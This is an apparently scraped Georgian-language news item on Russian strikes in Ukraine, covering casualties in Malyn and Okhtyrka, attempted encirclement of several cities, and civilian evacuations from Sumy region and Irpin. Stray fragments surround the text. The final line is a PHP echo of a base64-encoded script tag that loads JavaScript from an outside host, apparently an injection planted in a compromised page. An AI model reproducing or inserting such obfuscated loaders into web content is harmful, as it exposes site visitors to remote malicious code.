celsiusi
ავერსი შნაიდერი
რუსული ძალების მხრიდან შეტევებმა გასულ დღეებთან შედარებით იკლო, თუმცა, ღამის განმავლობაში კიევში განგაშის სიგნალი მაინც ისმოდა. ამის შესახებ ინფორმაციას უკრაინის თავდაცვის უწყება ავრცელებს.
 
ადგილობრივი გენშტაბის ინფორმაციით, ოკუპანტები კიევის, სუმის, ხარკოვის, მარიუპოლის, ნიკოლევისა და ჩერნიგოვის ალყაში მოქცევას კვლავ ცდილობენ. ბრძოლებია იზუმში, შავი და აზოვის ზღვებიდან უკრაინა სამოქალაქო და სამხედრო ობიექტებზე თავდასხმებს ელის.
 
უკრაინული მხარის ცნობით, ჟიტომირის რეგიონში ქალაქ მალინზე საჰაერო იერიშების შედეგად განადგურდა 7 საცხოვრებელი სახლი, დაიღუპა 5 ადამიანი, მათ შორის ბავშვები.
 
რუსეთის ძალები სუმის რეგიონში გუშინ თითქმის ორი საათის განმავლობაში ბომბავდნენ ქალაქ ახტირკას. დაიღუპა ერთი და დაშავდა 14 ადამიანი. უკრაინული მედია წერს, რომ სუმის ოლქიდან წარმატებით დასრულდა მშვიდობიანი მოსახლეობის ევაკუაციის ორივე ეტაპი და დაახლოებით 5 000 ადამიანი უსაფრთხო ადგილას გადაიყვანეს.
 
მოქალაქეების ევაკუაცია ავტობუსებით დღეს ქალაქ ირპინიდან იგეგმება.
787
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");